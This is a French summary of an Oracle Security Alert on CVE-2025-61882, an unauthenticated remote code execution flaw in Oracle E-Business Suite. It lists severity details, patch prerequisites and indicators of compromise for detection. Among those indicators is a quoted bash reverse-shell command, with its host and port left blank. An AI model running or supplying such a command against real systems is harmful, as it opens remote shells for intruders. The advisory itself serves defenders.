Alerte Oracle: RCE non authentifiée (CVE-2025-61882) dans Oracle E‑Business Suite (CVSS 9.8)

Source: Oracle — Oracle publie une Security Alert (04 octobre 2025) concernant CVE-2025-61882 affectant Oracle E‑Business Suite, avec risque d’exécution de code à distance sans authentification et publication d’IOCs pour la détection et la chasse aux menaces.

• Nature du risque: vulnérabilité d’exécution de code à distance (RCE) exploitable à distance sans authentification via le réseau. Score CVSS v3.1: 9.8. Le protocole mentionné est HTTP (les variantes sécurisées, ex. HTTPS, sont également concernées selon la matrice de risque). Composant indiqué: Oracle BI Publisher Concurrent Processing Integration.

• Correctifs et périmètre: Oracle fournit des mises à jour via cette Security Alert pour les versions d’Oracle E‑Business Suite sous Premier Support ou Extended Support. L’October 2023 Critical Patch Update est un prérequis à l’application des correctifs de cette alerte. Les versions antérieures non supportées ne sont pas testées, mais pourraient être affectées; Oracle recommande la mise à niveau vers des versions supportées.

• Détails de gravité (extraits de la matrice de risque):

  • Base Score: 9.8; Vector: Network, Complexity: Low, Privileges Required: None, User Interaction: None, Scope: Unchanged.
  • Impact: Confidentialité: High, Intégrité: High, Disponibilité: High.

• IOCs fournis par Oracle 🚨

  • IPs:
    • 200[.]107[.]207[.]26 — activité potentielle GET et POST
    • 185[.]181[.]60[.]11 — activité potentielle GET et POST
  • Commande observée (établissement d’une connexion TCP sortante sur un port spécifique):
    • sh -c /bin/bash -i >& /dev/tcp// 0>&1
  • Fichiers et hachages SHA-256:
    • SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88df- b4f72b104ca0f31235d; Fichier: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
    • SHA-256: aa0d3859d6633b62bccf- b69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121; Fichier: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
    • SHA-256: 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2e- f8aa46f0143bff34b882c1b; Fichier: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

• TTPs mentionnés 🧩

  • Exploitation réseau sans authentification via HTTP/HTTPS
  • RCE avec tentative de reverse shell (connexion TCP sortante)
  • Activité HTTP GET/POST vers des adresses IP spécifiques
  • Utilisation de scripts/archives d’exploit PoC identifiées par des SHA-256

Il s’agit d’une alerte de sécurité publiée par Oracle visant à annoncer un correctif critique, documenter le risque via une matrice CVSS et fournir des IOCs pour la détection, la chasse et la containment.

🔗 Source originale : https://www.oracle.com/security-alerts/alert-cve-2025-61882.html